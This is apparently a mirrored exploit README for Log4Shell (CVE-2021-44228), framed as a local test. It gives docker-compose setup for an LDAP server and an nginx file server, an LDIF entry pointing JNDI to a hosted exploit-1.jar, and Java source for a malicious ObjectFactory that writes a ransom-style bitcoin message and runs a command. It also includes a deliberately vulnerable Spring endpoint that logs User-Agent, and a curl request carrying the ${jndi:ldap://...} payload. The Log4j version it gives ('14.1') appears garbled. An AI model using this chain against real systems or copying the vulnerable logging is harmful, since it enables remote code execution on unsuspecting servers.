## https://sploitus.com/exploit?id=8021D807-3EDC-55A7-A9ED-A364159FADEE
# cve-2021-44228-log4j-test
Test
## **1. LDAP server and hacking file download server**
### **1.1 Run Docker-compose**
- docker-compose.yml
```
version: '2'
services:
  dockerdj:
    image: openidentityplatform/opendj:latest
    container_name: ldap
    environment:
      ROOT_USER_DN: "cn=han"
      ROOT_PASSWORD: "han"
      BASE_DN: "dc=bumbing,dc=xyz"
    ports:
      - "389:1389"
      - "636:1636"
      - "4444:4444"
    volumes:
      - "./opendj/logs:/opt/opendj/data/logs"
  nginx:
    image: nginx:latest
    container_name: nginx
    ports:
      - "7080:80"
    volumes:
      - "./file:/usr/share/nginx/html:ro"
      - "./conf/nginx.conf:/etc/nginx/nginx.conf"
```
- Run docker-compose
```bash
docker-compose up -d
```
### **1.2. Add the LDIF**
- add.ldif
```
version: 1

dn: dc=bumbing,dc=xyz
objectClass: domain
objectClass: top
dc: bumbing

dn: cn=log4j,dc=bumbing,dc=xyz
objectClass: javaContainer
objectClass: javaNamingReference
objectClass: javaObject
objectClass: top
cn: class
javaClassName: xyz.bumbing.log4j.Exploit
javaCodebase: http://{fileServer}:7080/exploit-1.jar
javaFactory: xyz.bumbing.log4j.Exploit
```
- Command to add the entry containing the hacking file information
```
ldapadd -D "cn=han" -w han -H ldap://{ldapServer} -f add.ldif
```
- LDAP test (parameter order matters)
```
curl ldap://{ldapServer}/cn=log4j,dc=bumbing,dc=xyz
```
## **2. Malicious file**
- Vulnerability found in Java versions before 8u191; build with Java version 8
### **2.1 Build the malicious file**
- Malicious code (a command that downloads another malicious file can be added.)
```java
import javax.naming.Context;
import javax.naming.Name;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.Hashtable;

public class Exploit implements javax.naming.spi.ObjectFactory {
    // JNDI calls this factory method when the LDAP reference from add.ldif is resolved.
    @Override
    public Object getObjectInstance(Object o, Name name, Context context, Hashtable<?, ?> hashtable) throws Exception {
        try {
            new File("/Users//test").createNewFile();
            String msg = "your computer has our virus. if you want to recover your computer, send bitcoin our wallet";
            FileOutputStream fileOutputSteam = new FileOutputStream(new File("/Users/hanbeomhee/test"));
            StringBuilder sb = new StringBuilder();
            sb.append(o.toString()).append("\n");
            sb.append(name).append("\n");
            sb.append(msg);
            fileOutputSteam.write(sb.toString().getBytes(StandardCharsets.UTF_8));
            fileOutputSteam.close();
        } catch (IOException e) {
            e.printStackTrace();
        }
        Runtime.getRuntime().exec("open /Users//test");
        return null;
    }
}
```
- Build command
```bash
./gradlew clean build
```
- Upload the locally built exploit-1.jar file to the docker/file folder of the file server
- Confirm that http://{fileServer}:7080/exploit-1.jar can be downloaded
## **3. Start the vulnerable server**
- Gradle structure
```groovy
plugins {
    id 'org.springframework.boot' version '2.6.1'
    id 'io.spring.dependency-management' version '1.0.11.RELEASE'
    id 'java'
}
group = 'xyz.bumbing'
version = '0.0.1-SNAPSHOT'
sourceCompatibility = '8'
configurations {
    compileOnly {
        extendsFrom annotationProcessor
    }
}
repositories {
    mavenCentral()
}
dependencies {
    implementation 'org.springframework.boot:spring-boot-starter-web'
    compileOnly 'org.projectlombok:lombok'
    annotationProcessor 'org.projectlombok:lombok'
    testImplementation 'org.springframework.boot:spring-boot-starter-test'
    implementation "org.springframework.boot:spring-boot-starter-log4j2"
    modules {
        module("org.springframework.boot:spring-boot-starter-logging") {
            replacedBy("org.springframework.boot:spring-boot-starter-log4j2", "Use Log4j2 instead of Logback")
        }
    }
}
test {
    useJUnitPlatform()
}
```
- Confirm log4j version 14.1 in the dependencies
- Server code
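```java
import javax.servlet.http.HttpServletRequest;
import lombok.extern.slf4j.Slf4j;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;

@SpringBootApplication
@RestController
@Slf4j
public class Log4jtestApplication {
    public static void main(String[] args) {
        SpringApplication.run(Log4jtestApplication.class, args);
    }

    @GetMapping("/log4j")
    public void test(String param, HttpServletRequest request) {
        // The client-supplied User-Agent header is passed to the logger unmodified.
        log.info(request.getHeader("User-Agent"));
    }
}
```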
- Run command (must be built and run with a version before 8u191)
```bash
java -jar build/libs/log4jtest-0.0.1-SNAPSHOT.jar
```
## **4. Run**
### 4.1 Run
```
curl --location --request GET 'localhost:8080/log4j' \
--header 'User-Agent: ${jndi:ldap://localhost/cn=log4j,dc=bumbing,dc=xyz}'
```